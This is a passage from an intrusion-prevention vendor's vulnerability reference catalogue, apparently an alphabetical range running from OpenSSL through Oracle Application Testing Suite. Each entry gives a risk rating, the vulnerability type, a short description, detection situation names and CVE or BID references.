Description: There exists a use-after-free vulnerability in the tls_get_message_body function of OpenSSL. A remote, unauthenticated attacker can use this to execute arbitrary code under the security context of the application using the vulnerable version of OpenSSL.
Situation: HTTPS_CS-OpenSSL-Tls_Get_Gessage_Body-Function-Init_Msg-Structure-Use-After-Free
References:
CVE-2016-6309
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6309
Back to top

OpenSSL-X.509-Email-Address-4-Byte-Buffer-Overflow-CVE-2022-3602

About this vulnerability: A buffer overflow vulnerability in OpenSSL
Risk: High
First detected in: sgpkg-ips-1521-5242
Last changed: sgpkg-ips-1521-5242
Platform: Generic
Software: <os>
Type: Buffer Overflow
Description: There exists a buffer overflow vulnerability in OpenSSL versions 3.0.0 to 3.0.6. An attacker can craft a malicious email address to overflow four attacker-controlled bytes on the stack, potentially resulting in a crash or, in rare cases, remote code execution.
Situation: TLS_CS-OpenSSL-X.509-Punycode-Email-Address-BOF
TLS_SS-OpenSSL-X.509-Punycode-Email-Address-BOF
References:
CVE-2022-3602
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3602
Back to top

OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read

About this vulnerability: An OpenSSL X.509 IPAddressFamily Extension Parsing Out-of-Bounds Read vulnerability
Risk: High
First detected in: sgpkg-ips-983-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: An out-of-bounds read vulnerability in OpenSSL, versions prior to 1.0.2l-git, which allows remote attackers to cause a denial of service condition by sending a crafted client or server certificate to the target.
Situation: TLS_SS-OpenSSL-X.509-IPAddressFamily-Extension-Parsing-Out-of-Bounds-Read
References:
CVE-2017-3735
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-3735
Back to top

OpenSSL-X509_cmp_Time-Denial-Of-Service

About this vulnerability: A vulnerability in OpenSSL Project OpenSSL
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenSSL
Type: Malfunction
Description: There is a denial of service vulnerability in OpenSSL that is caused by an error in X509_cmp_time(). The vulnerability may be exploited by sending a crafted certificate to a vulnerable OpenSLL client or server.
Situation: HTTPS_CS-OpenSSL-X509_cmp_Time-Denial-Of-Service
HTTPS_SS-OpenSSL-X509_cmp_Time-Denial-Of-Service
References:
CVE-2015-1789
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1789
BID-75156
http://www.securityfocus.com/bid/75156
Back to top

OpenTSDB-2.4.0-Unauthenticated-Command-Injection

About this vulnerability: A vulnerability in OpenTSDB.
Risk: High
First detected in: sgpkg-ips-1552-5242
Last changed: sgpkg-ips-1552-5242
Platform: Unix; Linux
Software: OpenTSDB
Type: Input Validation
Description: A vulnerability in OpenTSDB, versions 2.4.0 and before, which allows remote attackers to execute arbitrary system commands via the "yrange" parameter.
Situation: HTTP_CRL-OpenTSDB-2.4.0-Unauthenticated-Command-Injection
References:
CVE-2020-35476
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-35476
Back to top

OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-25826

About this vulnerability: An attempt to exploit a vulnerability in OpenTSDB detected
Risk: High
First detected in: sgpkg-ips-1828-5242
Last changed: sgpkg-ips-1828-5242
Platform: Linux
Software: OpenTSDB
Type: Input Validation
Description: A vulnerability in OpenTSDB, versions 2.4.1 and before, which allows remote attackers to execute arbitrary commands through the "key" parameter, due to insufficient input validation.
Situation: HTTP_CRL-OpenTSDB-2.4.1-Unauthenticated-Command-Injection
References:
CVE-2023-25826
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-25826
Back to top

OpenTSDB-2.4.1-Unauthenticated-Command-Injection-CVE-2023-36812

About this vulnerability: An attempt to exploit a vulnerability in OpenTSDB detected
Risk: High
First detected in: sgpkg-ips-1720-5242
Last changed: sgpkg-ips-1828-5242
Platform: Linux
Software: OpenTSDB
Type: Input Validation
Description: A vulnerability in OpenTSDB, versions 2.4.1 and before, which allows remote attackers to execute arbitrary commands through the "key" parameter, due to insufficient input validation.
Situation: HTTP_CRL-OpenTSDB-2.4.1-Unauthenticated-Command-Injection
References:
CVE-2023-36812
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-36812
Back to top

OpenVAS-Web-Vulnerability-Scanner

About this vulnerability: OpenVAS Vulnerability Scanner
Risk: Moderate
First detected in: sgpkg-ips-684-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: <os>
Type: Vulnerability Scanner
Description: OpenVAS is a vulnerability scanner designed to verify whether known vulnerabilities are found in webservers.
Situation: HTTP_CSH-OpenVAS-Scan-Detect-By-User-Agent
Back to top

OpenVMPS-Syslog-Format-String

About this vulnerability: OpenVMPS format string vulnerability in syslog calls
Risk: Moderate
First detected in: sgpkg-ips-61-1210
Last changed: sgpkg-ips-1296-5242
Platform: Linux
Software: OpenVMPS
Type: Format String
Description: OpenVMPS has a format string vulnerability that can be exploited for arbitrary remote code execution. A single crafted UDP package that contains format string specifiers can trigger the vulnerability.
Situation: Generic_OpenVMPS-Syslog-Format-String
References:
CVE-2005-4714
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4714
BID-15072
http://www.securityfocus.com/bid/15072
OSVDB-19910
http://www.osvdb.org/19910
Back to top

OpenVPN-P_Control-Denial-Of-Service

About this vulnerability: A vulnerability in OpenVPN Project OpenVPN
Risk: High
First detected in: sgpkg-ips-937-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenVPN
Type: Malfunction
Description: There exists a denial-of-service vulnerability in OpenVPN. A remote, unauthenticated attacker can trigger the vulnerability by sending a malicious packet, causing the server program to terminate.
Situation: Generic_UDP-OpenVPN-P_Control-Denial-Of-Service
Datalength-UDP_OpenVPN-P_Control-Denial-Of-Service
References:
CVE-2017-7478
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7478
Back to top

OpenVPN-Read_Key-Stack-Based-Buffer-Overflow

About this vulnerability: A vulnerability in OpenVPN
Risk: Moderate
First detected in: sgpkg-ips-1075-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenVPN
Type: Buffer Overflow
Description: There exists a stack-based buffer overflow vulnerability in OpenVPN. A remote, unauthenticated attacker can use this to execute arbitrary code in the security context of ROOT or SYSTEM.
Situation: Generic_UDP-OpenVPN-Read_Key-Stack-Based-Buffer-Overflow
References:
CVE-2017-12166
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-12166
Back to top

OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service

About this vulnerability: A vulnerability in OpenVPN Project OpenVPN
Risk: Moderate
First detected in: sgpkg-ips-1009-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenVPN
Type: Malfunction
Description: Improper handling of a malformed TCP header in the tunneled traffic causes an assertion failure in OpenVPN. A successful exploit allows a remote attacker to cause a denial of service condition on the receiving endpoint.
Situation: Generic_UDP-OpenVPN-Server-And-Client-Mss_fixup_IPv6-Denial-Of-Service
References:
CVE-2017-7508
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7508
Back to top

Openwsman-HTTP-Basic-Authentication-Buffer-Overflow

About this vulnerability: A vulnerability in Openwsman and VMware
Risk: High
First detected in: sgpkg-ips-171-2032
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Openwsman; EMC VMware ESX Server; EMC VMware ESXi Server
Type: Buffer Overflow
Description: There is a stack buffer overflow vulnerability in Openwsman, which is included in VMware ESX and EXi Server products. The flaw is due to improper processing of the HTTP basic authentication header. Remote attackers could exploit this vulnerability by sending HTTP requests with specially crafted header value. Successful exploitation would allow for arbitrary code injection and execution with the privileges of the security context of the current server process.
Situation: HTTP_CSH-Basic-Authentication-Header-Buffer-Overflow
References:
CVE-2008-2234
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2234
BID-30694
http://www.securityfocus.com/bid/30694
Back to top

OpenX-File-Upload-PHP-Code-Execution

About this vulnerability: An OpenX File Upload PHP Code Execution vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-723-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenX
Type: Input Validation
Description: A vulnerability in OpenX, versions 2.8.1 and before, which allows remote attackers to upload and execute arbitrary PHP files through banner-edit.php.
Situation: HTTP_CS-OpenX-File-Upload-PHP-Code-Execution
References:
CVE-2009-4098
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-4098
BID-37110
http://www.securityfocus.com/bid/37110
OSVDB-60499
http://www.osvdb.org/60499
Back to top

OpenX-Flowplayer-Backdoor-Remote-Code-Execution

About this vulnerability: OpenX Flowplayer Backdoor Remote Code Execution Vulnerability
Risk: Moderate
First detected in: sgpkg-ips-570-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OpenX
Type: Backdoor
Description: There is a backdoor in OpenX Ad Server 2.8.10 allowing execution of arbitrary code in target server.
Situation: HTTP_CRL-OpenX-Flowplayer-Backdoor-Remote-Code-Execution
References:
CVE-2013-4211
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4211
OSVDB-96073
http://www.osvdb.org/96073
Back to top

Opera-Browser-Content-Length-Buffer-Overflow

About this vulnerability: A vulnerability in Opera Opera Browser
Risk: Moderate
First detected in: sgpkg-ips-413-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Buffer Overflow
Description: A buffer overflow vulnerability exists in Opera Browser. The vulnerability is due to a boundary error in the way the browser processes HTTP server replies. Remote attackers could exploit this vulnerability by persuading a target user to connect to an attacker-controlled HTTP server with a vulnerable version of Opera. This vulnerability can be exploited by remote attackers to execute arbitrary code on the target machine. In attack scenarios where code execution is successful, the behaviour of the target machine would depend on the intention of the injected code, which would run within the security context of the logged in user.
Situation: HTTP_Reply-Content-Type-Missing
HTTP_Reply-Content-Length-Unparseable
HTTP_SHS-Suspiciously-Long-Reply-Content-Length-Header
Back to top

Opera-Browser-Document-Writing-Uninitialized-Memory-Access

About this vulnerability: A vulnerability in Opera Software Opera
Risk: Moderate
First detected in: sgpkg-ips-415-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Malfunction
Description: An uninitialized memory access vulnerability exists in Opera web browser. The vulnerability is due to an error while handling asynchronous modifications to an HTML document. A remote attacker can exploit this issue by enticing a target user to open a specifically crafted web page. Successful exploitation could result in execution of arbitrary code within the security context of the currently logged on user. An unsuccessful exploit attempt may abnormally terminate the affected application.
Situation: File-Text_Opera-Browser-Document-Writing-Uninitialized-Memory-Access
Back to top

Opera-Browser-File-URI-Handling-Buffer-Overflow

About this vulnerability: A buffer overflow vulnerability in Opera web browser
Risk: High
First detected in: sgpkg-ips-186-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Buffer Overflow
Description: There is a buffer overflow vulnerability in Opera web browser. The browser has a boundary error when handling excessively long Universal Resource Indicator (URI) strings using a file protocol handler. A remote attacker can exploit this vulnerability by enticing the target user to open a malicious HTML document. Successful attack may allow for arbitrary code injection and execution with privileges of the currently logged on user.
Situation: HTTP_SS-Opera-Browser-File-URI-Handling-Buffer-Overflow
File-Text_Opera-Browser-File-URI-Handling-Buffer-Overflow
References:
BID-32323
http://www.securityfocus.com/bid/32323
Back to top

Opera-History-Search-Cross-Site-Scripting

About this vulnerability: An Opera History Search Cross-Site Scripting vulnerability.
Risk: Moderate
First detected in: sgpkg-ips-764-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Cross-site Scripting
Description: A vulnerability in Opera, versions before 9.61, which allows remote attackers to inject arbitrary web scripts or HTML via the History Search database.
Situation: File-Text_Opera-History-Search-Cross-Site-Scripting
References:
CVE-2008-4696
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4696
BID-31869
http://www.securityfocus.com/bid/31869
OSVDB-49472
http://www.osvdb.org/49472
Back to top

Opera-Preferences-Modification

About this vulnerability: A script can alter Opera preferences in certain coditions
Risk: High
First detected in: sgpkg-ips-136-2032
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Malfunction
Description: There is a vulnerability in Opera browser that allows modification of the user preferences from an untrusted script. The preferences modification may be used to execute arbitary code in the context of the current user.
Situation: HTTP_SS-Opera-Suspicious-Preference-Modification
File-Text_Opera-Suspicious-Preference-Modification
Back to top

Opera-Software-Opera-GIF-Processing-Memory-Corruption

About this vulnerability: An Opera Software Opera GIF Processing Memory Corruption vulnerability
Risk: High
First detected in: sgpkg-ips-1008-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Malfunction
Description: A vulnerability in Opera which allows remote attackers to execute arbitrary code by enticing a target user to open a crafted GIF file, due to an unspecified error in Opera while processing GIF files.
Situation: File-GIF_Opera-Software-Opera-GIF-Processing-Memory-Corruption
References:
CVE-2012-6470
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-6470
Back to top

Opera-SVG-Animation-Element-DoS

About this vulnerability: Opera SVG Animation Element DoS Vulnerability.
Risk: High
First detected in: sgpkg-ips-676-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Browser
Description: A vulnerability exists in Opera 10.63 which allows remote attackers to cause a denial of service condition by using a malformed SVG animation element.
Situation: File-TextId_Opera-SVG-Animation-Element-DoS
Back to top

Opera-SVG-clipPath-After-Memory-Corruption

About this vulnerability: Opera SVG clipPath use-after-free exploit
Risk: Moderate
First detected in: sgpkg-ips-522-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opera
Type: Input Validation
Description: A vulnerability for parsing SVG vector image content exists in Opera Web Browsers prior version 12.13.
Situation: File-TextId_Opera-SVG-clipPath-After-Memory-Corruption
References:
CVE-2013-1638
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-1638
OSVDB-89614
http://www.osvdb.org/89614
Back to top

OPIE-FTP-Username-Off-By-One-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in OPIE
Risk: High
First detected in: sgpkg-ips-315-4219
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: OPIE
Type: Buffer Overflow
Description: There is a vulnerability in OPIE authentication package, included in various Unix distributions. The vulnerability could be exploited by local and remote users to execute arbitrary code on the vulnerable system. The vulnerability is due to a off-by-one vulnerability while processing attacker controlled username. The vulnerable code bounds-check the input string but incorrectly limits it to (buffersize+1). Remote attackers could exploit this vulnerability by sending a longer username to a vulnerable service that uses OPIE. Successful exploitation could result in execution of arbitrary code with root privileges.
Situation: FTP_Oversized-Username
References:
CVE-2010-1938
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2010-1938
BID-40403
http://www.securityfocus.com/bid/40403
Back to top

Opmantek-NMIS-SNMP-Trap-Cross-Site-Scripting-CVE-2016-5642

About this vulnerability: An attempt to exploit a vulnerability in Opmantek NMIS detected
Risk: High
First detected in: sgpkg-ips-1867-5242
Last changed: sgpkg-ips-1867-5242
Platform: Generic
Software: Opmantek NMIS
Type: Input Validation
Description: Opmantek NMIS before 8.5.12G has a cross-site scripting (XSS) vulnerability via SNMP Trap messages.
Situation: SNMP-UDP_Cross-Site-Scripting-Via-SNMP-Trap
References:
CVE-2016-5642
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-5642
Back to top

Opmantek-Open-Audit-Discoveries_Helper-Command-Injection

About this vulnerability: A vulnerability in Opmantek Open-AudIT
Risk: Moderate
First detected in: sgpkg-ips-1267-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opmantek Open-AudIT
Type: Input Validation
Description: Insufficient validation validation of request parameters in discoveries_helper.php causes a command injection vulnerability in Opmante Open-AudIT. A succesful exploit allows an attacker to execute arbitrary commands on the target system with the privileges of the target process.
Situation: HTTP_CS-Opmantek-Open-Audit-Discoveries_Helper-Command-Injection
References:
CVE-2020-12078
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-12078
Back to top

Opmantek-Open-Audit-M_discoveries.php-Command-Injection

About this vulnerability: A vulnerability in Opmantek Open-AudIT
Risk: Moderate
First detected in: sgpkg-ips-1252-5242
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Opmantek Open-AudIT
Type: Input Validation
Description: Insufficient validation of requests to m_discoveries.php causes a command injection vulnerability in Opmantek Open-AudIT. A successful exploit may allow an attacker to execute arbitrary commands on the target system.
Situation: HTTP_CRL-Opmantek-Open-Audit-M_discoveries.php-Command-Injection
References:
CVE-2020-11941
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-11941
Back to top

Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor

About this vulnerability: An attempt to exploit a vulnerability in Optergy Proton and Enterprise BMS applications detected
Risk: High
First detected in: sgpkg-ips-1657-5242
Last changed: sgpkg-ips-1657-5242
Platform: Linux;Unix
Software: Optergy Proton and Enterprise BMS
Type: Insecure Configuration
Description: A vulnerability in Optergy Proton and Enterprise BMS applications, versions 2.0.3a and below, which allows remote attackers to execute arbitrary code through an undocumented backdoor script Console.jsp.
Situation: HTTP_CSU-Optergy-Proton-And-Enterprise-BMS-Command-Injection-Using-A-Backdoor
References:
CVE-2019-7276
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-7276
Back to top

Optima-Apiftp-Server-Exe-Denial-of-Service

About this vulnerability: A vulnerability in Optima
Risk: High
First detected in: sgpkg-ips-609-5211
Last changed: sgpkg-ips-1296-5242
Platform: Windows
Software: Optima
Type: Misconfiguration
Description: There is a vulnerability in in Optima PLC control software which allows remote attacker to perform denial of service.
Situation: Generic_CS-Optima-Apiftp-Server-Exe-Denial-of-Service
Back to top

Oracle-10g-Isqlplus-Service-Heap-Overflow

About this vulnerability: A vulnerability in Oracle 10g
Risk: High
First detected in: sgpkg-ips-409-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Application Server 10g
Type: Buffer Overflow
Description: The Oracle 10g database software suite provides a web-based interface to allow for remote access and querying of the database. A vulnerability exists in the utility's method of user input parsing. An unauthenticated attacker may exploit this issue to create a denial of service condition or execute arbitrary code on a vulnerable system.
Situation: HTTP_CRL-Oracle-10g-Isqlplus-Service-Heap-Overflow
References:
BID-10871
http://www.securityfocus.com/bid/10871
Back to top

Oracle-9i-Xml-Database-BOF

About this vulnerability: Buffer overflow in Oracle9i XML Database (XDB)
Risk: High
First detected in: sgpkg-ips-32-1210
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle 9i
Type: Buffer Overflow
Description: Oracle9i database server contains multiple buffer overflow vulnerabilities in the XML database (XDB) component. A remote attacker could exploit these to cause a denial of service and to execute arbitrary code on the server.
Situation: Shared_CS-HTTP-Basic-Authorization-With-Long-Username-Or-Password
Shared_Oracle-9i-XDB-FTP-Server-Unlock-BOF
Shared_FTP-Long-Password
Shared_FTP-Long-TEST
References:
CVE-2003-0727
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0727
BID-8375
http://www.securityfocus.com/bid/8375
OSVDB-2449
http://www.osvdb.org/2449
Back to top

Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization

About this vulnerability: A vulnerability in Oracle Access Manager
Risk: Moderate
First detected in: sgpkg-ips-1446-5242
Last changed: sgpkg-ips-1446-5242
Platform: Generic
Software: Oracle Access Manager
Type: Input Validation
Description: Insufficient validation of requests sent to the OpenSSO Agent endpoint causes an insecure deserialization vulnerability in Oracle Access Manager. A successful exploit allows an attacker to execute arbitrary code on the target system.
Situation: HTTP_CS-Oracle-Access-Manager-Opensso-Agent-Insecure-Deserialization
References:
CVE-2021-35587
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-35587
Back to top

Oracle-Application-Server-10g-Emagent.exe-Stack-Buffer-Overflow

About this vulnerability: A vulnerability in Oracle Enterprise Manager Application Server Control
Risk: High
First detected in: sgpkg-ips-355-4219
Last changed: sgpkg-ips-1602-5242
Platform: Generic
Software: Oracle Application Server 10g
Type: Buffer Overflow
Description: A vulnerability has been reported in Oracle Application Server 10g and numerous other Oracle products. The vulnerability may be exploited remotely to cause a stack based buffer overflow in the affected process. This may allow malicious users to exploit this flaw in order to inject and execute arbitrary code on the target host. In a simple attack case aimed at creating a denial of service condition, Oracle Enterprise Management Agent will terminate. In a more sophisticated attack scenario, where the malicious user is successful in injecting and executing supplied code, the behaviour of the system is dependent on the nature the injected code. Any code injected into the vulnerable component will execute in the security context of the Oracleoracleas1ASControl service. This service runs as System by default installation on Windows platforms.
References:
BID-15146
http://www.securityfocus.com/bid/15146
Back to top

Oracle-Application-Server-10g-OPMN-Service-Format-String-Vulnerability

About this vulnerability: A vulnerability in Oracle Application Server
Risk: High
First detected in: sgpkg-ips-253-3038
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Server
Type: Format String
Description: There is a format string vulnerability in Oracle Application Server. The flaw is due to improper handling of user provided data when logging the events. A remote attacker could exploit this vulnerability by sending specially crafted requests to the target system.
Situation: X11_CS-Oracle-Application-Server-10g-OPMN-Service-Format-String
References:
CVE-2009-0993
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2009-0993
BID-34461
http://www.securityfocus.com/bid/34461
Back to top

Oracle-Application-Server-9i-WebCache-File-Corruption

About this vulnerability: A vulnerability in Oracle Application Server 9i Web Cache
Risk: High
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Oracle Application Server 9i
Type: Malfunction
Description: There exists a vulnerability in the way the Oracle Application Server validates the destination location of Web Cache dump files. The vulnerability is created as a result of insufficient restrictions placed on access rights to the file system. A user with administrative privileges may exploit this vulnerability to place Web Cache dump files into arbitrary locations on the file system.
Situation: HTTP_CSU-Oracle-Application-Server-9i-WebCache-File-Corruption
References:
CVE-2005-1382
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-1382
BID-13420
http://www.securityfocus.com/bid/13420
OSVDB-15909
http://www.osvdb.org/15909
Back to top

Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution

About this vulnerability: A vulnerability in Oracle Application Server
Risk: High
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Oracle Application Server
Type: Code Injection
Description: There exists a command execution vulnerability in Oracle Forms Services, a component of Oracle Application Server. The vulnerability is caused due to a flaw that allows for the unrestricted execution of forms from an absolute path. An attacker that is able to upload a Forms executable to the application server is able to run any OS command on the application server. The OS commands will be executed with the privileges of the running application server.
Situation: HTTP_CSU-Oracle-Application-Server-Forms-Arbitrary-System-Command-Execution
References:
CVE-2005-2372
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2372
Back to top

Oracle-Application-Server-Portal-Cross-Site-Scripting

About this vulnerability: A vulnerability in Oracle Application Server Portal
Risk: High
First detected in: sgpkg-ips-378-4219
Last changed: sgpkg-ips-1588-5242
Platform: Generic
Software: Oracle Application Server Portal
Type: Malfunction
Description: A cross-site scripting vulnerability exists in Oracle Application Server Portal.
Situation: HTTP_CSU-Oracle-Application-Server-Portal-Cross-Site-Scripting
Back to top

Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution

About this vulnerability: A vulnerability in Oracle Application Server
Risk: Moderate
First detected in: sgpkg-ips-356-4219
Last changed: sgpkg-ips-1589-5242
Platform: Generic
Software: Oracle Application Server; Oracle Developer Suite
Type: Code Injection
Description: There exists a command execution vulnerability in Oracle Reports Services, a component of Oracle Application Server. The vulnerability is caused due to a flaw that allows for the unrestricted execution of Reports executables using an absolute path. An attacker that is able to upload a Reports executable to the application server is able to run any OS command or read/write arbitrary text files on the application server. The target system will not show any abnormal behaviour after the malicious Report executable file is uploaded to the target host. After the malicious Report executable is executed, the behaviour of the target is dependent on the nature of the embedded system commands. The malicious system commands execute in the security context of the application server process, which is the user &quot;SYSTEM&quot; on Windows systems and the user &quot;Oracle&quot; on Unix-like systems.
Situation: HTTP_CSU-Oracle-Application-Server-Reports-Arbitrary-System-Command-Execution
References:
CVE-2005-2371
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2371
BID-14316
http://www.securityfocus.com/bid/14316
Back to top

Oracle-Application-Server-XSS

About this vulnerability: Oracle Application Server Cross-Site Scripting vulnerability
Risk: Moderate
First detected in: sgpkg-ips-200-2032
Last changed: sgpkg-ips-1396-5242
Platform: Generic
Software: Oracle Application Server
Type: Cross-site Scripting
Description: There is a cross-site scripting vulnerability in Oracle Application Server. This allows a remote user to inject malicious scripts into the the server.
Situation: HTTP_CSU-Oracle-Application-Server-XSS
References:
CVE-2008-4014
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4014
BID-33177
http://www.securityfocus.com/bid/33177
Back to top

Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Malfunction
Description: Authentication in the Oracle Application Testing Suite can be bypassed by exploiting an input validation vulnerability in the product with a crafted HTTP request.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Actionservlet-Authentication-Bypass
References:
CVE-2016-0487
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0487
Back to top

Oracle-Application-Testing-Suite-Authentication-Bypass

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Malfunction
Description: The Oracle Application Testing Suite does not correctly validate parameters passed to it in a URL. This allows an attacker to bypass authentication by means of a a directory traversal.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Authentication-Bypass
References:
CVE-2016-0492
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0492
Back to top

Oracle-Application-Testing-Suite-Download-Schedulereportname-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-735-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: A directory traversal vulnerability in Oracle's Application Testing Suite can be leveraged to download arbitrary files on the server. The vulnerability is due to improper validation of parameters passed to the /otp/download handler.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Schedulereportname-Directory-Traversal
References:
CVE-2016-0481
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0481
Back to top

Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-737-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: Arbitrary files can be downloaded from a server running the Oracle Application Testing Suite by exploiting a directory traversal vulnerability with a crafted request.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-File-Directory-Traversal
References:
CVE-2016-0482
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0482
Back to top

Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-729-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: The Oracle Application Testing Suite has a directory traversal vulnerability, which can be explited by sending a cradted request to the server. A successful exploitation allows aribtrary files to be downloaded from the server.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scenario-Directory-Traversal
References:
CVE-2016-0477
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0477
Back to top

Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: Arbitrary files can be downloaded from a server running the Oracle Application Testing Suite by exploiting a directory traversal vulnerability with a crafted request.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-Downloadservlet-Scriptpath-Directory-Traversal
References:
CVE-2016-0484
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0484
Back to top

Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: High
First detected in: sgpkg-ips-731-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: There exists a directory path traversal vulnerability in the Oracle Application Testing Suite. A remote attacker can use this to acchieve code execution on the affected system.
Situation: HTTP_CRL-Oracle-Application-Testing-Suite-ReportImage-Tempfilename-Directory-Traversal
References:
CVE-2016-0489
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-0489
Back to top

Oracle-Application-Testing-Suite-Reportname-Directory-Traversal

About this vulnerability: A vulnerability in Oracle Application Testing Suite
Risk: Moderate
First detected in: sgpkg-ips-726-5211
Last changed: sgpkg-ips-1296-5242
Platform: Generic
Software: Oracle Application Testing Suite
Type: Directory Traversal
Description: A directory traversal vulnerability exists in the in Oracle's Application Testing Suite. Exploiting this vulnerability may lead to arbitrary file download.
Situation: HTTP_CSU-Oracle-Application-Testing-Suite-Reportname-Directory-Traversal
